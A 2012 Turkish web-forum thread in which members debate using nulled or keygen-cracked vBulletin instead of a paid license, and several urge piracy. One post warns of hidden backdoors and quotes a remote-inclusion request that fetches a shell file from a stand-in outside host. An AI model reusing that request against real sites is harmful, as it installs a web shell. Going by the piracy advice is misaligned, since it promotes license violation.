• 16-09-2012, 14:51:02
    #10
    Üyeliği durduruldu
    ben çoook forum gördüm full, null sürüm kullanan bişeyde olmuyor zannetmem mesela webmaster kelimesinde iyi sırada olan bir forum var adı bende saklı 8 aydır sorunsuz kullanıyor (arkadaşımın)
    yani diceğim vbullentin dengesiz arkadaşın dediği gibi 1 ay sonrada olur 2 yıl sonrada olurki ciddi projesi olan kimse null, full kullanmaz şöle bişeyde var forumdada rast gelebilirsin mesela bir projeye atıldın başta full,null kullandın sonradan aynı sürümde gerçek lisansı alıp lisans dosyalarında değişiklik yaparak lisanslı hale getirilebiliyor

    yani kısa ve öz kullanın sorun olmaz yeterki siteniz hitli site olmasın
  • 16-09-2012, 15:04:36
    #11
    Üyeliği durduruldu
    iSoTurK adlı üyeden alıntı: mesajı görüntüle
    ben çoook forum gördüm full, null sürüm kullanan bişeyde olmuyor zannetmem mesela webmaster kelimesinde iyi sırada olan bir forum var adı bende saklı 8 aydır sorunsuz kullanıyor (arkadaşımın)
    yani diceğim vbullentin dengesiz arkadaşın dediği gibi 1 ay sonrada olur 2 yıl sonrada olurki ciddi projesi olan kimse null, full kullanmaz şöle bişeyde var forumdada rast gelebilirsin mesela bir projeye atıldın başta full,null kullandın sonradan aynı sürümde gerçek lisansı alıp lisans dosyalarında değişiklik yaparak lisanslı hale getirilebiliyor

    yani kısa ve öz kullanın sorun olmaz yeterki siteniz hitli site olmasın
    örnekyuncehennemi.com 200x'den beri lisanssız kullanıyor hiçte bişey olmadı geçen gün şikayet ettim 2-3 gün sonra bir baktım lisans almışlar ama hala lisanssız sürüm açıkları duruyor mutlaka biri hackler onu
  • 16-09-2012, 15:07:53
    #12
    Üyeliği durduruldu
    hzarali adlı üyeden alıntı: mesajı görüntüle
    parayı bulmak çokta zor değilde paypalım yok kredi kartım yok neyle ödeme yapacağım

    Nakit para bulacaksın sonucta , vcc alsana sen aykut abıden ben öyle yaptım'da aldım ana sıtesınden lısansı
  • 16-09-2012, 15:09:57
    #13
    Üyeliği durduruldu
    Melancolya adlı üyeden alıntı: mesajı görüntüle
    Nakit para bulacaksın sonucta , vcc alsana sen aykut abıden ben öyle yaptım'da aldım ana sıtesınden lısansı
    vcc ?
  • 16-09-2012, 15:13:04
    #14
    Üyeliği durduruldu
    hzarali adlı üyeden alıntı: mesajı görüntüle
    vcc ?
    benımde kredı kartım yoktu , aykut abıden 450 tl lik sanal kart aldım sanal kredı kartı daha sonra www.vbulletin.com 'a girip ordanda lisans aldım
  • 16-09-2012, 16:07:30
    #15
    Üyeliği durduruldu
    ya nullmu kullansam ne para vermekte pek işime gelmiyo zaten büyük sitelerin çoğu başta nulla başlamış
  • 16-09-2012, 18:17:45
    #16
    Null kullan gitsin hiç bir şey olmaz. Arkadaşım hala null kullanıyor 2 seneyi geçti
  • 17-09-2012, 10:26:36
    #17
    WMB
    Üyeliği durduruldu
    null kullanmayın onu null yapanlar içine gizli backdoor shell atıyor ve bunu bulmanıza imkan yok temizleyemezsiniz, adam öyle bir kor ki hiç bir taramaya yakalanmaz vb.php?gel=http://site.com/shell.txt yapar shelli php olarak siteye yükletir çok kolaydır backdoor atması.
  • 17-09-2012, 13:13:24
    #18
    Üyeliği durduruldu
    ya peki null yerine keygenli kullansak nasıl olur elimde vb 4.2.0 keygenli versiyon ve vb 4.2.0 null versiyon var ikisininde gördüğüm tüm açıklarını kapattım ve görünen dosyalara indirilme tarihi yazdım vb. hangisini kullanayım ?

    edit:dava derdi falan olurmu sonra başımıza bela almayalım